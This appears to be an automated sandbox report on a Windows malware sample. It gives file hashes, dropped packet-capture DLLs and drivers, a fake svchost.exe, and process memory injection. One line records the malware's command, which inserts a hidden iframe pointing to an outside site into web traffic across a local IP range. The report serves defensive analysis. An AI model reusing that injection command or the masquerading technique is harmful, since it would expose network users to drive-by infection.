41e4af28c02ed24207bc16e8c3bd3d279837129193536675597c27e2ea5705fc

General

Target

9b40f8bffa35e0d4c3b2c711eac079f9.exe
Size

239KB
MD5

9b40f8bffa35e0d4c3b2c711eac079f9
SHA1

fbaecfb1d2bb58d87232d1c632100d1cbc1366fd
SHA256

41e4af28c02ed24207bc16e8c3bd3d279837129193536675597c27e2ea5705fc
SHA512

de4ec6e6c4f7a8978044fa946ddc1dfb20d07554619964b414acd4e09cec15b30ead312823872387b5352d69a88b6c3526eae01de49b0a3f9b0a05c45600970e
SSDEEP

6144:4T7Sm8Krd795TX9wf0pP1F3CR/6b7Dt0wBCoHm:4Czwdx5zG5ifJ0YG

Score

8^/10

Malware Config

Signatures

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\WINDOWS\SysWOW64\drivers\svchost.exe	9b40f8bffa35e0d4c3b2c711eac079f9.exe
File created	C:\WINDOWS\SysWOW64\drivers\npf.sys	9b40f8bffa35e0d4c3b2c711eac079f9.exe

Executes dropped EXE 1 IoCs

pid	Process
2904	svchost.exe

Loads dropped DLL 8 IoCs

pid	Process
2372	9b40f8bffa35e0d4c3b2c711eac079f9.exe
2372	9b40f8bffa35e0d4c3b2c711eac079f9.exe
2904	svchost.exe
2904	svchost.exe
2904	svchost.exe
2904	svchost.exe
2904	svchost.exe
2904	svchost.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\WINDOWS\SysWOW64\pthreadVC.dll	9b40f8bffa35e0d4c3b2c711eac079f9.exe
File created	C:\WINDOWS\SysWOW64\WanPacket.dll	9b40f8bffa35e0d4c3b2c711eac079f9.exe
File created	C:\WINDOWS\SysWOW64\wpcap.dll	9b40f8bffa35e0d4c3b2c711eac079f9.exe
File created	C:\WINDOWS\SysWOW64\npptools.dll	9b40f8bffa35e0d4c3b2c711eac079f9.exe
File created	C:\WINDOWS\SysWOW64\Packet.dll	9b40f8bffa35e0d4c3b2c711eac079f9.exe

Suspicious behavior: LoadsDriver 13 IoCs

pid	Process
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2372 wrote to memory of 2904	2372	9b40f8bffa35e0d4c3b2c711eac079f9.exe	28
PID 2372 wrote to memory of 2904	2372	9b40f8bffa35e0d4c3b2c711eac079f9.exe	28
PID 2372 wrote to memory of 2904	2372	9b40f8bffa35e0d4c3b2c711eac079f9.exe	28
PID 2372 wrote to memory of 2904	2372	9b40f8bffa35e0d4c3b2c711eac079f9.exe	28

C:\Users\Admin\AppData\Local\Temp\9b40f8bffa35e0d4c3b2c711eac079f9.exe
"C:\Users\Admin\AppData\Local\Temp\9b40f8bffa35e0d4c3b2c711eac079f9.exe"
1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2372
- C:\WINDOWS\SysWOW64\drivers\svchost.exe
  C:\WINDOWS\system32\drivers\svchost.exe -idx 0 -ip 192.168.0.1-192.168.255.255 -port 80 -insert "<iframe src='http://www.cnhqt.com/mens/article/images/sp/mm/88vcd/index.htm' height='0' width='50' border='0'></iframe>"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:2904

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\WanPacket.dll

Filesize
66KB

MD5
b8d71659a336afebb07885cfafe6d46b

SHA1
f4b9f7e61d28b723a16c9a0cd4b84f4f05d9044f

SHA256
2362eb058d9aaac93de5504eefd617798ca618f0e31e660df6b7f017fbb07331

SHA512
66a9f45c84e15b262099078ecb4d893b58379f948fe9f8010b96f91607a70493a7b55304629c73fb81c0dcee04c78de32f7c75646f8a71af94ed37a3b7a0515f

Download Submit
C:\Windows\SysWOW64\drivers\NPF.sys

Filesize
41KB

MD5
243126da7ba441d7c7c3262dcf435a9c

SHA1
42616f7034c0f12e3e4a2166ebe082eb3f08223a

SHA256
80d36efd5b3abb82c421149d423e5019c21f203f085ae2655429a44bb5a9f5c0

SHA512
f5539774d89e8f025da97e7b49d143b7224fcf899db967a34445de70f9228ea5e2d5daffe6444492ce82a3dfb2734786e09140277c208ec1e64580ad74883e68

Download Submit
C:\Windows\SysWOW64\packet.dll

Filesize
86KB

MD5
040914bcb813675550a1428bb59ba905

SHA1
bd3ad909830290e72fd0a7021b72328e0f0ef32d

SHA256
192ddf52671c55fc538fc0c5798984997bd26bb4c7dc42d7ebcfb8517989d63f

SHA512
85784803baace9b13faac30153e3ce33a5457889a93f2db43b873b16e7dcb05657c7849129e2720eb50850646a8feba8fe0c0c560909656ab607aa9403d5431f

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
234KB

MD5
cb0afba4f0fb6ca2b2ea0d2c3e86b588

SHA1
2459367892e012314b451e05de1f1162448a05fa

SHA256
1b0fe60175c88f7cd3f3765b2f0f3eb1530b2e5e5b51f89a83e0322de32bdcf7

SHA512
a4e2d66af68dee67be5883c4770c1339b6be4847a993619389404af6a7ec9763361d9a14c632ca6704f63d84b05483f4bea2ec035b466fdaf03ce68c5cbca128

Download Submit
\Windows\SysWOW64\drivers\svchost.exe

Filesize
11KB

MD5
c26373769b6ffc7da7893ee0120cb82c

SHA1
29f4c6746f8a4d3066a31fc6a5ada0ffcddbd880

SHA256
b2bd3e36756754cdd4638b7a8accf26753e3254727db8431b4982e6482822935

SHA512
d2e722250726cf5b076ff48fb8a968e71c4351d6580c2d05631aff1197e40ef3dd893d43300882d8bea86ae5b542a8a02559393f6868c0ef2e604f577c6f686e

Download Submit
\Windows\SysWOW64\npptools.dll

Filesize
53KB

MD5
841007a04750a9acb56dd82095300d15

SHA1
58c1e338bc78a54795a844b559b614004e53d3cb

SHA256
a15c409af481494fa8c3d82ec0dc7c67075a706160cc060bec982e40c060d578

SHA512
dcaeae21ffc2479fc595632a93e082396caea1eb6c4093e24c199a5ee3dd09248dfb5fe11ea200034e2be928b2db09218d9d763428294347ccd63f4cad4c06de

Download Submit
memory/2372-13-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/2904-19-0x00000000002A0000-0x00000000002B5000-memory.dmp

Filesize
84KB

Download
memory/2904-22-0x0000000000030000-0x0000000000040000-memory.dmp

Filesize
64KB

Download
memory/2904-28-0x00000000003F0000-0x00000000003F9000-memory.dmp

Filesize
36KB

Download
memory/2904-29-0x00000000003F0000-0x00000000003F9000-memory.dmp

Filesize
36KB

Download
memory/2904-30-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing